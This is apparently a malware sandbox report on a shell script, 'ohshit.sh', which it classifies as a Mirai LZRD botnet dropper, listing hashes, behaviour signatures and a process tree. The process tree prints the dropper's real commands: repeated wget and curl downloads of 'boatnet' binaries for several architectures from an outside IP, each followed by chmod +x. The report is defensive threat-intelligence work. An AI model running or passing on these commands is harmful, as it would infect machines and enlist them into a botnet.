Overview

overview

10

Static

static

1

ohshit.sh

ubuntu-18.04-amd64

10

ohshit.sh

debian-9-armhf

5

ohshit.sh

debian-9-mips

10

ohshit.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    149s
  • max time network
    153s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240611-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    09-02-2025 16:28

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ohshit.sh

  • Size

    2KB

  • MD5

    f0977aee35c9bf421f707b9bfba5d9f7

  • SHA1

    5eacb3c68403f8f9c853f41914f27d5abc8645f5

  • SHA256

    f3e6052d4142e5a195e03e65d4a8acd2b7d6e790b6aacbc690ae909e7edb01f6

  • SHA512

    3184f088b0188b537c6a9ba0aa037c586d3267f17a11d4e6fbb65745b21dafbf37506e359dae372993fb6e28a06e3749b0b5a382901ac805cce83988772f53d9

Score
10/10
mirailzrdbotnetdefense_evasiondiscoveryupx

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

    botnetmirai
  • Mirai family
    mirai
  • File and Directory Permissions Modification 1 TTPs 6 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 6 IoCs
  • Modifies Watchdog functionality 1 TTPs 2 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

    defense_evasion
  • Unexpected DNS network traffic destination 5 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Writes file to system bin folder 2 IoCs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • System Network Configuration Discovery 1 TTPs 2 IoCs

    Adversaries may gather information about the network configuration of a system.

    discovery
  • Writes file to tmp directory 13 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/ohshit.sh
    /tmp/ohshit.sh
    1⤵
    • Executes dropped EXE
    • Modifies Watchdog functionality
    • Writes file to system bin folder
    • Reads runtime system information
    • Writes file to tmp directory
    PID:1478
    • /usr/bin/wget
      wget http://194.85.251.9/hiddenbin/boatnet.x86
      2⤵
      • Writes file to tmp directory
      PID:1479
    • /usr/bin/curl
      curl -O http://194.85.251.9/hiddenbin/boatnet.x86
      2⤵
      • Writes file to tmp directory
      PID:1483
    • /bin/cat
      cat boatnet.x86
      2⤵
        PID:1484
      • /bin/chmod
        chmod +x boatnet.x86 config-err-wyp2Uv netplan_gsm552c4 ohshit.sh snap-private-tmp ssh-zLJyRkZwfWgF systemd-private-ab3d93cdee204eac989d9d97b6faf745-bolt.service-pXNYLF systemd-private-ab3d93cdee204eac989d9d97b6faf745-colord.service-dMsLxG systemd-private-ab3d93cdee204eac989d9d97b6faf745-ModemManager.service-XU1dQA systemd-private-ab3d93cdee204eac989d9d97b6faf745-systemd-resolved.service-xYf2P0 systemd-private-ab3d93cdee204eac989d9d97b6faf745-systemd-timedated.service-TlyAal WTF
        2⤵
        • File and Directory Permissions Modification
        PID:1485
      • /usr/bin/wget
        wget http://194.85.251.9/hiddenbin/boatnet.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:1490
      • /usr/bin/curl
        curl -O http://194.85.251.9/hiddenbin/boatnet.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:1491
      • /bin/chmod
        chmod +x boatnet.mips boatnet.x86 config-err-wyp2Uv netplan_gsm552c4 ohshit.sh snap-private-tmp ssh-zLJyRkZwfWgF systemd-private-ab3d93cdee204eac989d9d97b6faf745-bolt.service-pXNYLF systemd-private-ab3d93cdee204eac989d9d97b6faf745-colord.service-dMsLxG systemd-private-ab3d93cdee204eac989d9d97b6faf745-ModemManager.service-XU1dQA systemd-private-ab3d93cdee204eac989d9d97b6faf745-systemd-resolved.service-xYf2P0 systemd-private-ab3d93cdee204eac989d9d97b6faf745-systemd-timedated.service-TlyAal WTF
        2⤵
        • File and Directory Permissions Modification
        PID:1501
      • /usr/bin/wget
        wget http://194.85.251.9/hiddenbin/boatnet.arc
        2⤵
        • Writes file to tmp directory
        PID:1506
      • /usr/bin/curl
        curl -O http://194.85.251.9/hiddenbin/boatnet.arc
        2⤵
        • Writes file to tmp directory
        PID:1534
      • /bin/chmod
        chmod +x boatnet.arc boatnet.mips boatnet.x86 config-err-wyp2Uv netplan_gsm552c4 ohshit.sh snap-private-tmp ssh-zLJyRkZwfWgF systemd-private-ab3d93cdee204eac989d9d97b6faf745-bolt.service-3bfHF4 systemd-private-ab3d93cdee204eac989d9d97b6faf745-colord.service-dMsLxG systemd-private-ab3d93cdee204eac989d9d97b6faf745-ModemManager.service-XU1dQA systemd-private-ab3d93cdee204eac989d9d97b6faf745-systemd-resolved.service-xYf2P0 WTF
        2⤵
        • File and Directory Permissions Modification
        PID:1542
      • /usr/bin/wget
        wget http://194.85.251.9/hiddenbin/boatnet.i468
        2⤵
          PID:1547
        • /usr/bin/curl
          curl -O http://194.85.251.9/hiddenbin/boatnet.i468
          2⤵
          • Writes file to tmp directory
          PID:1548
        • /bin/chmod
          chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 config-err-wyp2Uv netplan_gsm552c4 ohshit.sh snap-private-tmp ssh-zLJyRkZwfWgF systemd-private-ab3d93cdee204eac989d9d97b6faf745-bolt.service-3bfHF4 systemd-private-ab3d93cdee204eac989d9d97b6faf745-colord.service-dMsLxG systemd-private-ab3d93cdee204eac989d9d97b6faf745-ModemManager.service-XU1dQA systemd-private-ab3d93cdee204eac989d9d97b6faf745-systemd-resolved.service-xYf2P0 WTF
          2⤵
          • File and Directory Permissions Modification
          PID:1550
        • /usr/bin/wget
          wget http://194.85.251.9/hiddenbin/boatnet.i686
          2⤵
            PID:1555
          • /usr/bin/curl
            curl -O http://194.85.251.9/hiddenbin/boatnet.i686
            2⤵
            • Writes file to tmp directory
            PID:1556
          • /bin/chmod
            chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 config-err-wyp2Uv netplan_gsm552c4 ohshit.sh snap-private-tmp ssh-zLJyRkZwfWgF systemd-private-ab3d93cdee204eac989d9d97b6faf745-bolt.service-3bfHF4 systemd-private-ab3d93cdee204eac989d9d97b6faf745-colord.service-dMsLxG systemd-private-ab3d93cdee204eac989d9d97b6faf745-ModemManager.service-XU1dQA systemd-private-ab3d93cdee204eac989d9d97b6faf745-systemd-resolved.service-xYf2P0 WTF
            2⤵
            • File and Directory Permissions Modification
            PID:1558
          • /usr/bin/wget
            wget http://194.85.251.9/hiddenbin/boatnet.x86_64
            2⤵
            • Writes file to tmp directory
            PID:1563
          • /usr/bin/curl
            curl -O http://194.85.251.9/hiddenbin/boatnet.x86_64
            2⤵
            • Writes file to tmp directory
            PID:1763
          • /bin/chmod
            chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 config-err-wyp2Uv netplan_gsm552c4 ohshit.sh snap-private-tmp ssh-zLJyRkZwfWgF systemd-private-ab3d93cdee204eac989d9d97b6faf745-bolt.service-xQi3aU systemd-private-ab3d93cdee204eac989d9d97b6faf745-colord.service-dMsLxG systemd-private-ab3d93cdee204eac989d9d97b6faf745-ModemManager.service-XU1dQA systemd-private-ab3d93cdee204eac989d9d97b6faf745-systemd-resolved.service-xYf2P0 WTF
            2⤵
            • File and Directory Permissions Modification
            PID:1771
          • /usr/bin/wget
            wget http://194.85.251.9/hiddenbin/boatnet.mpsl
            2⤵
            • Writes file to tmp directory
            PID:1776
          • /usr/bin/curl
            curl -O http://194.85.251.9/hiddenbin/boatnet.mpsl
            2⤵
            • Writes file to tmp directory
            PID:1777

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • /tmp/boatnet.x86
          Filesize

          29KB

          MD5

          8231c76be6663e62d7d5a8ea685ff498

          SHA1

          03177493e6a6d9e3b7aaca572245065ffcfe0575

          SHA256

          c45cbd5ce92e34f62bd3e1e19c36daf662860aac2a22a5d67924788acc71e3bc

          SHA512

          1a8eb5eaf84d38252f4535a2a89aca76fadf7854d218c6bca7ec2521ee485d9bd082e3eeff4ec981abaf0e18afc0eed7415ae656d3080b152fb7b35370caa9ac

          Download Submit